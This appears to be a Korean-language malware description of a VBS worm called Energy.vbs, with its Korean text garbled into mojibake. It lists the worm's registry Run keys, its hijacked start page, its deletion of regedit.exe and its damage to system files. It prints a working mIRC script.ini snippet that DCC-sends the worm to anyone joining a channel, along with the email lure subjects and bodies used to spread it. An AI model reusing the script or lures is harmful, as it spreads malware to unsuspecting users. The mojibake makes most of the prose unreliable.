|
ÀÌ ¹ÙÀÌ·¯½º¸¦ ½ÇÇàÇϸé À©µµ¿ì Æú´õ¿¡ MSNetLog ¿Í
À©µµ¿ì Command Æú´õ
¿¡ Energy.vbs¸¦ »ý¼ºÇÑ´Ù.
·¹Áö½ºÆ®¸®¿¡ ¾Æ·¡¿Í °°Àº ³»¿ëÀ» Ãß°¡ÇÑ´Ù.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\Searc
hMSN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\MSNet
Log
½ÃÀÛ È¨ÆäÀÌÁö¸¦ "http://vx.dirtyhosting.com"·Î ¹Ù
²Û´Ù.
mirc °¡ ¼³Ä¡µÇ¾î ÀÖÀ¸¸é script.ini ¸¦ ¾Æ·¡¿Í °°ÀÌ
¹Ù²Û´Ù.
[script]
;MIRC Script By Ahamad Boby
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&windir&"\Command\Energy.vbs
n3=}
¾Æ¿ô·èÀÇ ÁÖ¼Ò·Ï¿¡ µî·ÏµÇ¾î ÀÖ´Â »ç¿ëÀڵ鿡°Ô ¾Æ·¡
ÀÇ ³»¿ëÁßÀÇ Çϳª¿Í ÇÔ
²² Energy.vbs ¸¦ ÷ºÎÇÏ¿© º¸³½´Ù
Á¦¸ñ : Surprise
º»¹® : A nice surprise for you, check it out...
Á¦¸ñ : Great...
º»¹® : Great app, check it out..
Á¦¸ñ : Important, Please Read
º»¹® : A paper I downloaded from Symantec about
new virus, you should
read it
Á¦¸ñ : Happy Birthday
º»¹® : A happy birthday surprise
Á¦¸ñ : Take a look...
º»¹® : Take a look and the app that chenge to a
pic
Á¦¸ñ : Great Joke.. Read it
º»¹® : Read this joke, it is so great... ha ha
·¹Áö½ºÆ®¸®¸¦ ¼öÁ¤ÇÏÁö ¸øÇϵµ·Ï regedit.exe ÆÄÀÏÀ»
Áö¿î´Ù.
2 ÀÏ 10 ÀÏ 20 ÀÏ 28 ÀÏ¿¡ notepad.exe ¸¦ °è¼Ó ½ÇÇà
½ÃŲ´Ù.
½Ã½ºÅÛ Æú´õ¿¡¼ È®ÀåÀÚ°¡ sys, dll, ocx ÀÎ ÆÄÀÏÀ»
ã¾Æ ¼Õ»ó½ÃŲ´Ù.
|
|
|